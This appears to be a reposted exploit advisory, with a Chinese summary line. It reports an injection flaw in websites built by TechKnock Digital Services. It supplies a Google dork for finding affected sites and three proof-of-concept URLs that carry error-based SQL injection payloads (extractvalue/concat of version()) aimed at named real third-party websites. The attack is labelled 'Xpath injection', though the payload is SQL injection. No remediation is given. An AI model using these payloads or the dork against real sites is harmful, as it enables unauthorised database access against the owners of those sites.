TechKnock Digital Services被发现存在Xpath注入漏洞,允许攻击者通过构造特定URL提取数据库版本信息,并附带了三个POC链接以示证明。 2025-5-24 19:41:47 Author: cxsecurity.com(查看原文) 阅读量:16 收藏
TechKnock Digital Services - Xpath Injection Vulnerability
********************************************************* #Exploit Title: TechKnock Digital Services - Xpath Injection Vulnerability #Date: 2025-05-21 #Exploit Author: Behrouz Mansoori #Google Dork: "Developed By TechKnock Digital Services." #Category:webapps #Tested On: Mac, Firefox Proof of Concept: ### Demo : http://rs-enterprises.co.in/category.php?id=2%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+ http://www.rs-enterprises.co.in/product-detail.php?id=5%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+&catid=1 http://hailmaryrefrigeration.co.in/products.php?id=42%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+&catid=1 ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh